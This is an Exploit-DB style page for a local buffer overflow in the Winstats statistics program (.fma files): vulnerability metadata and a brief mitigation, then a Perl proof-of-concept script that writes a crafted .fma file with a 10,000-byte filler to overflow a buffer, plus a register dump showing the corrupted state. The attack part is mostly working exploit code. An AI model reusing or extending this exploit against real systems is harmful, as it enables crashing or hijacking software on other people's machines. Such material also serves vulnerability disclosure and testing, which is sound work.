Winstats (.fma) local Buffer Overflow Poc

vendor:

by:

MadjiX

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name:

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3 FR

Unknown

Winstats (.fma) local Buffer Overflow Poc

This exploit is a Proof of Concept for a local buffer overflow vulnerability in Winstats (.fma) file. The exploit is tested on Windows XP SP3 FR.

Mitigation:

Apply the latest patches and updates from the vendor. Do not open untrusted .fma files.

Source

Exploit-DB raw data:

###################################################################
#Exploit Title : Winstats (.fma) local Buffer Overflow Poc
#tested on windows xp SP 3 FR
#Author: MadjiX
#Special Greets:His0k4 [ where are you :( ]
#Greets:Bibi-info , Silectovic , Volc4n0
#App: http://math.exeter.edu/rparris/peanut/wsfr32z.exe
###################################################################
#-->Fenètre-->1variable-->Fichier-->Ouvrir--> Open madjix.fma file
#Note:Open the file twice i dont no why
#EAX 0000060E
#ECX 00000000
#EDX 00D66898
#EBX 616D662E
#ESP 0012F74C
#EBP 0012F750
#ESI 00AD7AE0
#EDI 41414141
#EIP 00432675 wstatfr.00432675
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 0  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDF000(FFF)
#T 0  GS 0000 NULL
###################################################################
my $file= "MadjiX.fma";

my $hd = "\xB9\x01\x00\x00\x09\x00\x00\x00".
"\x50\x00\x00\x00\x5D\x00\x00\x00".
"\x00\x02\x00\x00\x00\x02\x00\x00".
"\x00\x00\x00\x00\x01\x00\x00\x00".
"\x3D\x00\x00\x00\xD9\xFF\xFF\xFF".
"\x2C\x01\x00\x00\x64\x00\x00\x00".
"\x64\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x0A";

my $ft = "\x0A\x00\x00\x00\x0A\x00\x00\x00\x0A\x00".
"\x00\x00\x0C\x00\x00\x00\xF0\xFF\xFF\xFF".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x90\x01\x00\x00\x00\x00\x00\x00".
"\x08\x02\x01\x31\x43\x6F\x75\x72\x69\x65".
"\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\xF3\xFF\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x90\x01\x00\x00\x00\x00\x00\x02\x08".
"\x02\x01\x31\x53\x79\x6D\x62\x6F\x6C\x00".
"\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\xF3\xFF\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x90\x01\x00\x00\x00\x00\x00\x00\x08".
"\x02\x01\x31\x43\x6F\x75\x72\x69\x65\x72".
"\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\xF5\xFF\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x90\x01\x00\x00\x00\x00\x00\x00\x08".
"\x02\x01\x31\x43\x6F\x75\x72\x69\x65\x72".
"\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\xF0\xFF\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x90\x01\x00\x00\x00\x00\x00\x00\x08".
"\x02\x01\x02\x54\x69\x6D\x65\x73\x00\x72".
"\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\xF5\xFF\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x90\x01\x00\x00\x00\x00\x00\x00\x08".
"\x02\x01\x31\x43\x6F\x75\x72\x69\x65\x72".
"\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\xF3\xFF\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x90\x01\x00\x00\x00\x00\x00\x00\x08".
"\x02\x01\x31\x43\x6F\x75\x72\x69\x65\x72".
"\x20\x4E\x65\x77\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\xF3\xFF\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x09\x00\x10\x00\x00\x00\x00\x00\x00".
"\x80\x20\x13\x14\x36\xF7\x57\x26\x96\x57".
"\x22\x04\xE6\x57\x70\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00";

my $junk = "\x41" x 10000 ;

open($FILE,">$file");
print $FILE $hd.$junk.$ft;
close($FILE);